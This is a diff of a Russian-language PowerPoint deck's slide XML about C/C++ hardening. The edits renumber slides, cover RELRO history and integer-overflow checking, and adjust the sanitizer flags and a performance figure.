 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14769,7 +14937,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide47.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14856,7 +15024,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide47.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide48.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15035,7 +15203,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide48.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide49.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15865,136 +16033,6 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide49.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B8E7810-D0A8-4634-93F0-ED0AC0D81DED}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>История</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801672DB-F6AD-4CB3-A053-3E47CCBF67BF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Подход RELRO уже использовался ранее для инициализации vtables </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(partial RELRO)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Ian Lance Taylor</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>: Linker </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>relro</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Потребовалась лишь небольшая адаптация для GOT</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (full RELRO)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160064826"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
 <file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -16266,6 +16304,136 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B8E7810-D0A8-4634-93F0-ED0AC0D81DED}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>История</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801672DB-F6AD-4CB3-A053-3E47CCBF67BF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подход RELRO уже использовался ранее для инициализации vtables </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(partial RELRO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Ian Lance Taylor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>: Linker </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>relro</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Потребовалась лишь небольшая адаптация для GOT</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (full RELRO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160064826"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide51.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C959E6E0-49FC-47E3-B907-3E8C02CEE8E1}"/>
               </a:ext>
             </a:extLst>
@@ -16408,7 +16576,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide51.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide52.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16618,7 +16786,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide52.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide53.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16702,7 +16870,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide53.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide54.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16852,7 +17020,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide54.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide55.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17329,7 +17497,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide55.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide56.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17628,7 +17796,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide56.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide57.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18330,7 +18498,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide57.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide58.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18560,7 +18728,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide58.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide59.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18824,90 +18992,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716798563"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide59.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FC243D-B202-4F31-A4DF-4AF817233640}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверка целочисленных переполнений</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C2332E-D266-4879-883F-74C1BEE5C67F}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442791335"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19168,6 +19252,90 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FC243D-B202-4F31-A4DF-4AF817233640}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверка целочисленных переполнений</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C2332E-D266-4879-883F-74C1BEE5C67F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442791335"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide61.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2AF8B44-9846-43A7-A173-784CB989F268}"/>
               </a:ext>
             </a:extLst>
@@ -19547,7 +19715,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide61.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide62.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19861,7 +20029,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide62.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide63.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19982,7 +20150,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>3x </a:t>
+              <a:t>30% </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -20288,7 +20456,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide63.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide64.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20356,7 +20524,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -20383,7 +20551,21 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>-trap=undefined</a:t>
+              <a:t>-trap=signed-integer-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -20457,13 +20639,27 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>=undefined -</a:t>
+              <a:t>=signed-integer-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fsanitize</a:t>
             </a:r>
             <a:r>
@@ -20499,14 +20695,31 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>undefined,integer</a:t>
+              <a:t>=integer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(может потребоваться добавить некоторые </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>хедеры в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>blacklist</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -20582,7 +20795,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide64.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide65.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20666,7 +20879,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide65.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide66.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21012,7 +21225,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide66.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide67.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21220,7 +21433,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide67.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide68.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21340,7 +21553,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide68.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide69.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21615,89 +21828,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014055000"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide69.xml><?xml version="1.0" encoding="utf-8"?>
